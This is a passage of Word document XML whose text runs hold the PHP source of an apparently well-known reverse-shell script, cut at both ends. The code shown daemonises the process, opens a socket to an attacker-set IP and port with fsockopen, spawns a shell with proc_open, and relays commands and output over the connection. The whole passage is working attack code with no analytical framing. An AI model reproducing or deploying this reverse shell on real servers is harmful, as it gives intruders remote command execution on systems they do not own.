    <w:p w14:paraId="7EEACF17" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$daemon = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117906E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$debug = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C952A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="0DC357DC" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E401B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Daemonise ourself if possible to avoid zombies later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE1397" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A026225" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="387BFA90" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// pcntl_fork is hardly ever available, but will allow us to daemonise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074826FB" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// our php process and avoid zombies.  Worth a try...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C154A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>if (function_exists('pcntl_fork')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899BB3B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Fork and have the parent process exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0B04F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>$pid = pcntl_fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168936D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC9671" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if ($pid == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654185B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Can't fork");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13375AD0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3ABDD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B051002" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C43E496" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if ($pid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A50963" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(0);  // Parent exits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D65EBF7" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A23C5" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="17DB0985" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Make the current process a session leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908FBB2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Will only succeed if we forked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACC755" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (posix_setsid() == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176808C2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("Error: Can't setsid()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D24BE24" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F1F61" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54839DD6" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="584AED2A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>$daemon = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79369A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E30A3B0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04666F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAA5D0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="3917EF36" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Change to a safe directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640AB81" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>chdir("/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00593D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="5A6C7025" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Remove any umask we inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17265E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>umask(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C279F57" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="2718B97A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90543C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Do the reverse shell...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC769D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F1F68" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="41449F5D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Open reverse connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A290AD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$sock = fsockopen($ip, $port, $errno, $errstr, 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794E0CF" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>if (!$sock) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25816C99" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>printit("$errstr ($errno)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FF149" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57487734" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1211DF22" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="52A9DBA4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Spawn shell process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595BF692" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$descriptorspec = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F30A2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t xml:space="preserve">   0 =&gt; array("pipe", "r"),  // stdin is a pipe that the child will read from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C9786A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t xml:space="preserve">   1 =&gt; array("pipe", "w"),  // stdout is a pipe that the child will write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D51E1" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t xml:space="preserve">   2 =&gt; array("pipe", "w")   // stderr is a pipe that the child will write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDAD045" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174D55C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="0A2A1E1D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>$process = proc_open($shell, $descriptorspec, $pipes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD20366" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="6FD910C1" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>if (!is_resource($process)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564BEDC" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Can't spawn shell");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FAFCC7" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC025B4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357321D7" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="1CE5F878" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Set everything to non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79D262" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>// Reason: Occsionally reads will block, even though stream_select tells us they won't</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588DBB0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>stream_set_blocking($pipes[0], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60997F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>stream_set_blocking($pipes[1], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED7D93" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>stream_set_blocking($pipes[2], 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F71B2F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>stream_set_blocking($sock, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DACF69" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="6A53DA37" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>printit("Successfully opened reverse shell to $ip:$port");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE75F7A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="20468997" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>while (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D191728" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Check for end of TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A474D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (feof($sock)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE32C8" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Shell connection terminated");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF0C61" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EACA78" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566205B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="79F416D3" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Check for end of STDOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C9FB4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if (feof($pipes[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79278A63" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Shell process terminated");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4FB89" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62B579" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8C2CB" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="4CB5A56F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// Wait until a command is end down $sock, or some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F987C4C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// command output is available on STDOUT or STDERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E55BCE" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>$read_a = array($sock, $pipes[1], $pipes[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FFD2C4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25457662" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="74DB4485" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// If we can read from the TCP socket, send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0A7FE" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// data to process's STDIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799708C" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (in_array($sock, $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147F8A52" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("SOCK READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEA2EFF" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($sock, $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6219EA37" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("SOCK: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B2A4E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($pipes[0], $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2C282" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577CDCB4" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="6C2BB94F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// If we can read from the process's STDOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6470F652" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// send data down tcp connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA693E9" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (in_array($pipes[1], $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D852F9A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDOUT READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79801E9A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($pipes[1], $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322FD4B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDOUT: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C101F" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($sock, $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E341FD" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676760BF" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="03F7776D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// If we can read from the process's STDERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD43A0" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>// send data down tcp connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D081F59" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (in_array($pipes[2], $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA78B73" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDERR READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D86C2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($pipes[2], $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07477B00" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDERR: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C465D28" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($sock, $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12709D2D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A926E" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E03997" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="6D0E0F19" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>fclose($sock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F662998" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>fclose($pipes[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D567B45" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>fclose($pipes[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C3D1BF" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>fclose($pipes[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08525166" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>proc_close($process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590974B2" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="5ACEA4CF" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>// Like print, but does nothing if we've daemonised ourself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495725D" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
